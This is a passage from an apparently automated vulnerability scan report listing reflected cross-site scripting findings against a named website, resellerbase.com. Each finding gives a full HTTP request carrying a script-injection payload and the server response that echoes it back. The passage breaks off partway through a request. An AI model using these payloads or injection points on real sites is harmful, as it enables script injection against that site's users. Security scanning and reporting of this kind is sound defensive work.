<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos7625a<script>alert(1)</script>27e08d48dcf/ was not found on this server.</p>
...[SNIP]...

2.2664. http://www.resellerbase.com/detail/39/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eb6f4<script>alert(1)</script>9a3a57da5c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/?eb6f4<script>alert(1)</script>9a3a57da5c2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/?eb6f4<script>alert(1)</script>9a3a57da5c2=1 was not found on this server.</p>
...[SNIP]...

2.2665. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90046<script>alert(1)</script>0eba9ee2647 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail90046<script>alert(1)</script>0eba9ee2647/39/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail90046<script>alert(1)</script>0eba9ee2647/39/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2666. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c83af<script>alert(1)</script>85904773b45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39c83af<script>alert(1)</script>85904773b45/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39c83af<script>alert(1)</script>85904773b45/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2667. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4aaa4<script>alert(1)</script>4abfb112643 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes4aaa4<script>alert(1)</script>4abfb112643/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes4aaa4<script>alert(1)</script>4abfb112643/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2668. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e2d5<script>alert(1)</script>867731f10ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos5e2d5<script>alert(1)</script>867731f10ff/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos5e2d5<script>alert(1)</script>867731f10ff/images/ was not found on this server.</p>
...[SNIP]...

2.2669. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c260f<script>alert(1)</script>9864e37adfe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/imagesc260f<script>alert(1)</script>9864e37adfe/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/imagesc260f<script>alert(1)</script>9864e37adfe/ was not found on this server.</p>
...[SNIP]...

2.2670. http://www.resellerbase.com/detail/39/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59bf5<script>alert(1)</script>f8fd8a99893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/?59bf5<script>alert(1)</script>f8fd8a99893=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/?59bf5<script>alert(1)</script>f8fd8a99893=1 was not found on this server.</p>
...[SNIP]...

2.2671. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5e88<script>alert(1)</script>bdc36ad4ba8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild5e88<script>alert(1)</script>bdc36ad4ba8/39/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild5e88<script>alert(1)</script>bdc36ad4ba8/39/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2672. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 107ce<script>alert(1)</script>cd0966088a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39107ce<script>alert(1)</script>cd0966088a2/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39107ce<script>alert(1)</script>cd0966088a2/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2673. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60af6<script>alert(1)</script>863819d30b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes60af6<script>alert(1)</script>863819d30b5/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes60af6<script>alert(1)</script>863819d30b5/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2674. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de225<script>alert(1)</script>d377dfa2728 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmosde225<script>alert(1)</script>d377dfa2728/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmosde225<script>alert(1)</script>d377dfa2728/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2675. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8f966<script>alert(1)</script>5353b499e4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images8f966<script>alert(1)</script>5353b499e4/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images8f966<script>alert(1)</script>5353b499e4/rating/ was not found on this server.</p>
...[SNIP]...

2.2676. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bd968<script>alert(1)</script>2435d117f61 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/ratingbd968<script>alert(1)</script>2435d117f61/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/ratingbd968<script>alert(1)</script>2435d117f61/ was not found on this server.</p>
...[SNIP]...

2.2677. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1b376<script>alert(1)</script>7d2dca9b54a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/rating/?1b376<script>alert(1)</script>7d2dca9b54a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/images/rating/?1b376<script>alert(1)</script>7d2dca9b54a=1 was not found on this server.</p>
...[SNIP]...

2.2678. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dac15<script>alert(1)</script>7295d65a751 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildac15<script>alert(1)</script>7295d65a751/39/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildac15<script>alert(1)</script>7295d65a751/39/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2679. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92d14<script>alert(1)</script>e043cf1767d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3992d14<script>alert(1)</script>e043cf1767d/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3992d14<script>alert(1)</script>e043cf1767d/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2680. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2885e<script>alert(1)</script>5771e30e237 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes2885e<script>alert(1)</script>5771e30e237/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes2885e<script>alert(1)</script>5771e30e237/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2681. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ccc88<script>alert(1)</script>f80bb03a5a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmosccc88<script>alert(1)</script>f80bb03a5a7/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmosccc88<script>alert(1)</script>f80bb03a5a7/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2682. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b9bb8<script>alert(1)</script>cab73711af8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/imagesb9bb8<script>alert(1)</script>cab73711af8/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/kosmos/imagesb9bb8<script>alert(1)</script>cab73711af8/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2683. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a3e9d<script>alert(1)</script>933f21d39c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos/images/ratinga3e9d<script>alert(1)</script>933f21d39c6/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
